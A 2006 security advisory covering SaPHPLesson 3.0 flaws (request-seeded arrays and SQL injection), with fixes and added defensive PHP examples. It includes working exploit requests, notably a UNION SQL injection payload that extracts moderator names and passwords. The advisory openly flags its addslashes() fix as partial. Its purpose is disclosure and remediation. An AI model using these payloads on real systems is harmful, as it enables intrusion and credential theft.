SaPHPLession30.txt

2006-05-06T00:00:00
ID PACKETSTORM:46114
Type packetstorm
Reporter D3vil-0x1
Modified 2006-05-06T00:00:00

Description

                                        
SaPHPLesson 3.0 Multiple Bugs By :-- D3vil-0x1 | Devil-00 --:
  
1- Uninitialised array (seeded from the request through register_globals)
  
Filename :- show.php  
Line :- 102  
  
[code]  
$hrow[] = $Row2;[/code]  
  
Fix :-

Add this code at line [ 11 ] of /show.php :-

Initialising the array near the top of the script means a request parameter of the same name can no longer seed it before the loop appends to it, which covers every unfiltered use of the variable in the file.
  
[code]  
$hrow = array();[/code]  
  
Exploit :-  
  
GET ^  
/lessons/show.php?lessid=1&hrow=D3vil-0x1  
  
/---------------------------------------------------------/  
  
2- Uninitialised array (seeded from the request through register_globals)
  
Filename :- showcat.php  
Line :- 80  
  
[code]  
$Lsnrow[] = $Row;[/code]  
  
Fix :-

Add this code at line [ 11 ] of /showcat.php :-

As with show.php, initialising the array at the top of the script stops a request parameter from seeding it, which covers every unfiltered use of the variable in the file.
  
[code]  
$Lsnrow = array();[/code]  
  
Exploit :-  
  
GET ^  
  
/lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1  
  
/---------------------------------------------------------/  
  
3- SQL Injection  
  
Filename :- search.php  
Line :- Multiple lines (28 and 32)
  
Fix :-  
  
Replace line 28 with

[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.".addslashes($Find)." REGEXP'$Word' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]

Replace line 32 with

[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.$Find REGEXP'%$Word%' and less.forumno='".addslashes($Cat)."' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]

Note that these replacements only partially close the hole. $Find, $Order and $Trteb are interpolated as a column name and sort clause, i.e. outside any quotes, so addslashes() has nothing to escape and a payload like the Find= value in the exploit below still goes straight into the query; these three values have to be checked against a fixed list of allowed column names and directions instead. $Word is still interpolated unescaped on both lines, and the line 32 replacement leaves $Find untouched. Also, MySQL REGEXP treats % as a literal character, so the '%$Word%' pattern on line 32 does not act as a wildcard the way it would in a LIKE.
  
Exploit :-  
  
POST ^  
  
Word=a&Find=lesstitle UNION ALL SELECT null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,null,null,null,null,null,null,null,null FROM modretor/*&Cat=All&Order=lessid&Trteb=DESC  
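An added example (editor's code, not part of the advisory or of SaPHPLesson) of how the search.php query could be built so that the Find/Order/Trteb payload above is refused rather than escaped: identifiers are taken from a whitelist and the search term is bound as a parameter. The table and column names less, forums, lesstitle, lessid, forumno and Hidden come from the advisory; the full set of searchable and sortable columns, the PDO connection and PHP 7+ are assumptions.

```php
<?php
// Added example, not SaPHPLesson code: whitelist-based replacement for the
// search.php query builder. Column lists and the PDO connection are assumed.

function buildSearchQuery(array $in): array
{
    // Identifiers sit outside quotes in the SQL, so they cannot be escaped;
    // anything not in these lists is rejected outright. (assumed column sets)
    $searchable = ['lesstitle', 'lesstext'];
    $sortable   = ['lessid', 'lesstitle'];
    $directions = ['ASC', 'DESC'];

    $find  = (string)($in['Find']  ?? 'lesstitle');
    $order = (string)($in['Order'] ?? 'lessid');
    $dir   = strtoupper((string)($in['Trteb'] ?? 'DESC'));
    $word  = (string)($in['Word']  ?? '');
    $cat   = (string)($in['Cat']   ?? 'All');

    if (!in_array($find, $searchable, true)) {
        throw new InvalidArgumentException("Find: '$find' is not a searchable column");
    }
    if (!in_array($order, $sortable, true)) {
        throw new InvalidArgumentException("Order: '$order' is not a sortable column");
    }
    if (!in_array($dir, $directions, true)) {
        throw new InvalidArgumentException("Trteb: '$dir' must be ASC or DESC");
    }

    // The search term is the only value in a data position, so it is bound
    // as a parameter instead of being interpolated into the string.
    $sql = 'SELECT * FROM less, forums WHERE less.Hidden != 1'
         . " AND BINARY less.$find REGEXP :word"
         . ' AND forums.id = less.forumno';
    $params = [':word' => $word];

    if ($cat !== 'All') {
        // less.forumno is compared against a forum id: cast, do not quote.
        $sql .= ' AND less.forumno = :cat';
        $params[':cat'] = (int)$cat;
    }
    $sql .= " ORDER BY $order $dir";

    return [$sql, $params];
}

// Usage against a live database (connection details assumed):
//   $pdo = new PDO($dsn, $user, $pass, [PDO::ATTR_EMULATE_PREPARES => false]);
//   [$sql, $params] = buildSearchQuery($_POST);
//   $stmt = $pdo->prepare($sql);
//   $stmt->execute($params);

// The advisory's payload is refused before any SQL is assembled.
$payload = [
    'Word'  => 'a',
    'Find'  => 'lesstitle UNION ALL SELECT null,null,null,ModName,null,null,null,null,'
             . 'ModPassword,null,null,null,null,null,null,null,null,null,null,null FROM modretor/*',
    'Cat'   => 'All',
    'Order' => 'lessid',
    'Trteb' => 'DESC',
];
try {
    buildSearchQuery($payload);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// A legitimate request still yields a parameterised query.
[$sql, $params] = buildSearchQuery([
    'Word' => 'intro', 'Find' => 'lesstitle', 'Cat' => '1', 'Order' => 'lessid', 'Trteb' => 'desc',
]);
echo $sql, PHP_EOL;
```

Running it prints the rejection for the UNION payload, then the legitimate query with :word and :cat placeholders and a fixed ORDER BY lessid DESC. The REGEXP pattern remains user-controlled; bound as a parameter it cannot change the statement, but an expensive pattern can still tie up the database, so a LIKE with escaped wildcards is the safer choice if regular-expression search is not actually needed.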
  
/---------------------------------------------------------/  
  
4- SQL Injection  
  
Filename :- misc.php  
Line :- 64  
  
Fix :-
Replace lines 62 & 63 with this code, which forces both values to integers before they reach the query :-
  
[code]  
$LID = intval($_GET["LID"]);  
$Rate = intval($_POST["Rate"]);[/code]  
  
/---------------------------------------------------------/  
  
5- Uninitialised array (seeded from the request through register_globals)
  
Filename :- index.php  
Line :- 24  
  
[code]  
$rows[] = $Row;[/code]  
  
Fix :-

Add this code at line [ 11 ] of /index.php :-

Initialising both arrays at the top of the script stops a request parameter from seeding either of them, which covers every unfiltered use of these variables in the file.
  
[code]  
$rows = array();  
$hrow = array();[/code]  
  
Exploit :-  
  
GET ^  
  
/saphplesson/index.php?rows=D3vil-x01  
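An added example (editor's code, not part of the advisory or of SaPHPLesson) showing why bugs 1, 2 and 5 need the array initialised before the loop. extract() stands in here for register_globals, the PHP option that turned request parameters into variables; the advisory's GET exploits presuppose it is on (it was off by default since PHP 4.2 but common on hosts of the period, and was removed in PHP 5.4). The row data is constructed for the example, and the request uses the hrow[] array form of the advisory's parameter because modern PHP refuses [] on a non-empty string.

```php
<?php
// Added example, not SaPHPLesson code. extract() simulates register_globals;
// the lesson rows and the request are constructed sample data.

function collectRowsVulnerable(array $request, array $dbRows): array
{
    extract($request);            // simulates register_globals: ?hrow[]=... sets $hrow
    foreach ($dbRows as $Row2) {
        $hrow[] = $Row2;          // show.php line 102: appends to whatever $hrow already holds
    }
    return $hrow ?? [];
}

function collectRowsFixed(array $request, array $dbRows): array
{
    extract($request);
    $hrow = array();              // the advisory's fix: start from an empty array
    foreach ($dbRows as $Row2) {
        $hrow[] = $Row2;
    }
    return $hrow;
}

// Constructed sample data: two lesson rows as the database would return them.
$dbRows = [
    ['lessid' => 1, 'lesstitle' => 'Introduction'],
    ['lessid' => 2, 'lesstitle' => 'Arrays'],
];

// The advisory's request with the parameter sent as an array, so that it
// arrives as a list the loop can append to.
$request = [
    'lessid' => '1',
    'hrow'   => [['lessid' => '0', 'lesstitle' => 'D3vil-0x1']],
];

$vuln  = collectRowsVulnerable($request, $dbRows);
$fixed = collectRowsFixed($request, $dbRows);

echo count($vuln),  ' rows, first title: ', $vuln[0]['lesstitle'],  PHP_EOL;
echo count($fixed), ' rows, first title: ', $fixed[0]['lesstitle'], PHP_EOL;
```

Run with php, the vulnerable collector returns three rows with the attacker-supplied one first, so the injected entry is rendered alongside real lessons; the fixed collector returns only the two database rows. The same pattern applies to $Lsnrow in showcat.php and $rows in index.php.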